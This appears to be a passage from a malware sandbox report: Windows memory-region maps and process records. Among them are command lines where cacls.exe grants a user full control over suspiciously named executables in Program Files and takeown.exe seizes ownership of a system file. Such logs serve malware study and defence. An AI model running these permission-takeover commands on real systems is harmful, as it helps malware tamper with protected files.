end_va = 0xb0d9920fff entry_point = 0xb0d9900000 region_type = mapped_file name = "cmd.exe.mui" filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui") Region: id = 8028 start_va = 0xb0d9bc0000 end_va = 0xb0d9c18fff entry_point = 0xb0d9bc0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 8029 start_va = 0xb0db820000 end_va = 0xb0dba3ffff entry_point = 0x0 region_type = private name = "private_0x000000b0db820000" filename = "" Region: id = 8030 start_va = 0xb0dba40000 end_va = 0xb0dbc54fff entry_point = 0x0 region_type = private name = "private_0x000000b0dba40000" filename = "" Region: id = 8031 start_va = 0xb0db370000 end_va = 0xb0db47cfff entry_point = 0x0 region_type = private name = "private_0x000000b0db370000" filename = "" Region: id = 8032 start_va = 0xb0db4c0000 end_va = 0xb0db4cffff entry_point = 0x0 region_type = private name = "private_0x000000b0db4c0000" filename = "" Region: id = 8033 start_va = 0xb0dbc60000 end_va = 0xb0dbe7dfff entry_point = 0x0 region_type = private name = "private_0x000000b0dbc60000" filename = "" Region: id = 8034 start_va = 0xb0dbe80000 end_va = 0xb0dbf96fff entry_point = 0x0 region_type = private name = "private_0x000000b0dbe80000" filename = "" Region: id = 8035 start_va = 0xb0d9900000 end_va = 0xb0d993ffff entry_point = 0x0 region_type = private name = "private_0x000000b0d9900000" filename = "" Region: id = 8036 start_va = 0xb0d9bc0000 end_va = 0xb0d9bc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b0d9bc0000" filename = "" Region: id = 8037 start_va = 0x7ff7fd08e000 end_va = 0x7ff7fd08ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7fd08e000" filename = "" Region: id = 8038 start_va = 0xb0dbfa0000 end_va = 0xb0dc057fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b0dbfa0000" filename = "" Region: id = 8039 start_va = 0xb0d9bc0000 end_va = 0xb0d9bc3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b0d9bc0000" filename = "" Region: id = 8040 start_va = 0x7ffaf24b0000 end_va = 0x7ffaf24d1fff entry_point = 0x7ffaf24b0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 8041 start_va = 0x7ffaf2a00000 end_va = 0x7ffaf2a12fff entry_point = 0x7ffaf2a00000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 8042 start_va = 0x7ffaf35e0000 end_va = 0x7ffaf3637fff entry_point = 0x7ffaf35e0000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 8043 start_va = 0xb0d9bd0000 end_va = 0xb0d9bd6fff entry_point = 0x0 region_type = private name = "private_0x000000b0d9bd0000" filename = "" Region: id = 8044 start_va = 0xb0d9be0000 end_va = 0xb0d9be4fff entry_point = 0xb0d9be0000 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 8045 start_va = 0xb0d9bf0000 end_va = 0xb0d9bf0fff entry_point = 0xb0d9bf0000 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 8046 start_va = 0xb0d9c00000 end_va = 0xb0d9c01fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b0d9c00000" filename = "" Region: id = 8047 start_va = 0x7ffaecc30000 end_va = 0x7ffaecea3fff entry_point = 0x7ffaecc30000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll") Region: id = 8048 start_va = 0xb0d9c10000 end_va = 0xb0d9c10fff entry_point = 0xb0d9c10000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 8049 start_va = 0xb0d9c20000 end_va = 0xb0d9c21fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b0d9c20000" filename = "" Region: id = 8050 start_va = 0xb0d9c10000 end_va = 0xb0d9c10fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b0d9c10000" filename = "" Thread: id = 908 os_tid = 0x348 Thread: id = 911 os_tid = 0x81c Thread: id = 912 os_tid = 0x374 Thread: id = 913 os_tid = 0xfc8 Process: id = "111" image_name = "cacls.exe" filename = "c:\\windows\\syswow64\\cacls.exe" page_root = "0x691d8000" os_pid = "0xff0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "95" os_parent_pid = "0x974" cmd_line = "cacls \"C:\\Program Files\\Windows Portable Devices\\restaurant.exe\" /E /G CIiHmnxMn6Ps:F /C" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8060 start_va = 0x1e0000 end_va = 0x1fffff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 8061 start_va = 0x200000 end_va = 0x201fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 8062 start_va = 0x210000 end_va = 0x223fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 8063 start_va = 0x230000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 8064 start_va = 0x270000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 8065 start_va = 0x2b0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 8066 start_va = 0xd70000 end_va = 0xd79fff entry_point = 0xd70000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\SysWOW64\\cacls.exe" (normalized: "c:\\windows\\syswow64\\cacls.exe") Region: id = 8067 start_va = 0xd80000 end_va = 0x4d7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d80000" filename = "" Region: id = 8068 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 8069 start_va = 0x7f9e0000 end_va = 0x7fa02fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f9e0000" filename = "" Region: id = 8070 start_va = 0x7fa06000 end_va = 0x7fa06fff entry_point = 0x0 region_type = private name = "private_0x000000007fa06000" filename = "" Region: id = 8071 start_va = 0x7fa09000 end_va = 0x7fa09fff entry_point = 0x0 region_type = private name = "private_0x000000007fa09000" filename = "" Region: id = 8072 start_va = 0x7fa0d000 end_va = 0x7fa0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fa0d000" filename = "" Region: id = 8073 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8074 start_va = 0x7fff0000 end_va = 0x7dfaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 8075 start_va = 0x7dfaf7a10000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfaf7a10000" filename = "" Region: id = 8076 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8077 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 8078 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002c0000" filename = "" Region: id = 8079 start_va = 0x2d0000 end_va = 0x2d1fff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 8080 start_va = 0x3f0000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 8081 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 8082 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 8083 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 8084 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 8085 start_va = 0x400000 end_va = 0x60ffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8086 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 8087 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 8088 start_va = 0x1e0000 end_va = 0x1effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 8089 start_va = 0x7f8e0000 end_va = 0x7f9dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f8e0000" filename = "" Region: id = 8090 start_va = 0x2e0000 end_va = 0x39dfff entry_point = 0x2e0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8091 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 8092 start_va = 0x3a0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 8093 start_va = 0x400000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8094 start_va = 0x510000 end_va = 0x60ffff entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 8095 start_va = 0x74c60000 end_va = 0x74cdafff entry_point = 0x74c60000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 8096 start_va = 0x7fa0a000 end_va = 0x7fa0cfff entry_point = 0x0 region_type = private name = "private_0x000000007fa0a000" filename = "" Region: id = 8097 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 8098 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 8099 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 8100 start_va = 0x1f0000 end_va = 0x1f3fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 8101 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 8102 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 8103 start_va = 0x74650000 end_va = 0x74677fff entry_point = 0x74650000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 8104 start_va = 0x610000 end_va = 0x79ffff entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 8105 start_va = 0x200000 end_va = 0x203fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 8108 start_va = 0x7a0000 end_va = 0xad6fff entry_point = 0x7a0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 8126 start_va = 0x3e0000 end_va = 0x3e1fff entry_point = 0x3e0000 region_type = mapped_file name = "cacls.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\cacls.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\cacls.exe.mui") Thread: id = 915 os_tid = 0xfe0 Thread: id = 916 os_tid = 0xf9c Process: id = "112" image_name = "cacls.exe" filename = "c:\\windows\\syswow64\\cacls.exe" page_root = "0x639c9000" os_pid = "0xfc4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "105" os_parent_pid = "0xf4c" cmd_line = "cacls \"C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\" /E /G CIiHmnxMn6Ps:F /C" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8128 start_va = 0xd40000 end_va = 0xd5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d40000" filename = "" Region: id = 8129 start_va = 0xd60000 end_va = 0xd61fff entry_point = 0x0 region_type = private name = "private_0x0000000000d60000" filename = "" Region: id = 8130 start_va = 0xd70000 end_va = 0xd79fff entry_point = 0xd70000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\SysWOW64\\cacls.exe" (normalized: "c:\\windows\\syswow64\\cacls.exe") Region: id = 8131 start_va = 0xd80000 end_va = 0x4d7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d80000" filename = "" Region: id = 8132 start_va = 0x4d80000 end_va = 0x4d93fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004d80000" filename = "" Region: id = 8133 start_va = 0x4da0000 end_va = 0x4ddffff entry_point = 0x0 region_type = private name = "private_0x0000000004da0000" filename = "" Region: id = 8134 start_va = 0x4de0000 end_va = 0x4e1ffff entry_point = 0x0 region_type = private name = "private_0x0000000004de0000" filename = "" Region: id = 8135 start_va = 0x4e20000 end_va = 0x4e23fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004e20000" filename = "" Region: id = 8136 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 8137 start_va = 0x7fcd0000 end_va = 0x7fcf2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007fcd0000" filename = "" Region: id = 8138 start_va = 0x7fcfb000 end_va = 0x7fcfbfff entry_point = 0x0 region_type = private name = "private_0x000000007fcfb000" filename = "" Region: id = 8139 start_va = 0x7fcfc000 end_va = 0x7fcfefff entry_point = 0x0 region_type = private name = "private_0x000000007fcfc000" filename = "" Region: id = 8140 start_va = 0x7fcff000 end_va = 0x7fcfffff entry_point = 0x0 region_type = private name = "private_0x000000007fcff000" filename = "" Region: id = 8141 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8142 start_va = 0x7fff0000 end_va = 0x7dfaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 8143 start_va = 0x7dfaf7a10000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfaf7a10000" filename = "" Region: id = 8144 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8145 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 8146 start_va = 0x4e30000 end_va = 0x4e30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004e30000" filename = "" Region: id = 8147 start_va = 0x4e40000 end_va = 0x4e41fff entry_point = 0x0 region_type = private name = "private_0x0000000004e40000" filename = "" Region: id = 8149 start_va = 0x4eb0000 end_va = 0x4ebffff entry_point = 0x0 region_type = private name = "private_0x0000000004eb0000" filename = "" Region: id = 8150 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 8151 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 8152 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 8153 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 8154 start_va = 0x4ec0000 end_va = 0x512ffff entry_point = 0x0 region_type = private name = "private_0x0000000004ec0000" filename = "" Region: id = 8155 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 8156 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 8157 start_va = 0xd40000 end_va = 0xd4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d40000" filename = "" Region: id = 8158 start_va = 0x7fbd0000 end_va = 0x7fccffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007fbd0000" filename = "" Region: id = 8234 start_va = 0x4ec0000 end_va = 0x4f7dfff entry_point = 0x4ec0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8235 start_va = 0x5030000 end_va = 0x512ffff entry_point = 0x0 region_type = private name = "private_0x0000000005030000" filename = "" Region: id = 8236 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 8237 start_va = 0x4e50000 end_va = 0x4e8ffff entry_point = 0x0 region_type = private name = "private_0x0000000004e50000" filename = "" Region: id = 8238 start_va = 0x4f80000 end_va = 0x4fbffff entry_point = 0x0 region_type = private name = "private_0x0000000004f80000" filename = "" Region: id = 8239 start_va = 0x74c60000 end_va = 0x74cdafff entry_point = 0x74c60000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 8240 start_va = 0x7fcf8000 end_va = 0x7fcfafff entry_point = 0x0 region_type = private name = "private_0x000000007fcf8000" filename = "" Region: id = 8241 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 8242 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 8243 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 8244 start_va = 0xd50000 end_va = 0xd53fff entry_point = 0x0 region_type = private name = "private_0x0000000000d50000" filename = "" Region: id = 8245 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 8246 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 8247 start_va = 0x74650000 end_va = 0x74677fff entry_point = 0x74650000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 8248 start_va = 0x5130000 end_va = 0x531ffff entry_point = 0x0 region_type = private name = "private_0x0000000005130000" filename = "" Region: id = 8249 start_va = 0xd60000 end_va = 0xd63fff entry_point = 0x0 region_type = private name = "private_0x0000000000d60000" filename = "" Region: id = 8250 start_va = 0x5320000 end_va = 0x5656fff entry_point = 0x5320000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 8278 start_va = 0x4e90000 end_va = 0x4e91fff entry_point = 0x4e90000 region_type = mapped_file name = "cacls.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\cacls.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\cacls.exe.mui") Thread: id = 917 os_tid = 0xfb4 Thread: id = 920 os_tid = 0xc94 Process: id = "113" image_name = "takeown.exe" filename = "c:\\windows\\syswow64\\takeown.exe" page_root = "0x455cb000" os_pid = "0x828" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "88" os_parent_pid = "0xf04" cmd_line = "takeown /F \"C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8159 start_va = 0x170000 end_va = 0x17ffff entry_point = 0x170000 region_type = mapped_file name = "takeown.exe" filename = "\\Windows\\SysWOW64\\takeown.exe" (normalized: "c:\\windows\\syswow64\\takeown.exe") Region: id = 8160 start_va = 0xec0000 end_va = 0x4ebffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ec0000" filename = "" Region: id = 8161 start_va = 0x4ec0000 end_va = 0x4edffff entry_point = 0x0 region_type = private name = "private_0x0000000004ec0000" filename = "" Region: id = 8162 start_va = 0x4ee0000 end_va = 0x4ee1fff entry_point = 0x0 region_type = private name = "private_0x0000000004ee0000" filename = "" Region: id = 8163 start_va = 0x4ef0000 end_va = 0x4f03fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004ef0000" filename = "" Region: id = 8164 start_va = 0x4f10000 end_va = 0x4f4ffff entry_point = 0x0 region_type = private name = "private_0x0000000004f10000" filename = "" Region: id = 8165 start_va = 0x4f50000 end_va = 0x4f8ffff entry_point = 0x0 region_type = private name = "private_0x0000000004f50000" filename = "" Region: id = 8166 start_va = 0x4f90000 end_va = 0x4f93fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004f90000" filename = "" Region: id = 8167 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 8168 start_va = 0x7e820000 end_va = 0x7e842fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e820000" filename = "" Region: id = 8169 start_va = 0x7e84b000 end_va = 0x7e84dfff entry_point = 0x0 region_type = private name = "private_0x000000007e84b000" filename = "" Region: id = 8170 start_va = 0x7e84e000 end_va = 0x7e84efff entry_point = 0x0 region_type = private name = "private_0x000000007e84e000" filename = "" Region: id = 8171 start_va = 0x7e84f000 end_va = 0x7e84ffff entry_point = 0x0 region_type = private name = "private_0x000000007e84f000" filename = "" Region: id = 8172 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8173 start_va = 0x7fff0000 end_va = 0x7dfaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 8174 start_va = 0x7dfaf7a10000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfaf7a10000" filename = "" Region: id = 8175 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8176 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 8177 start_va = 0x4fa0000 end_va = 0x4fa0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004fa0000" filename = "" Region: id = 8178 start_va = 0x4fb0000 end_va = 0x4fb1fff entry_point = 0x0 region_type = private name = "private_0x0000000004fb0000" filename = "" Region: id = 8179 start_va = 0x51a0000 end_va = 0x51affff entry_point = 0x0 region_type = private name = "private_0x00000000051a0000" filename = "" Region: id = 8180 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 8181 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type 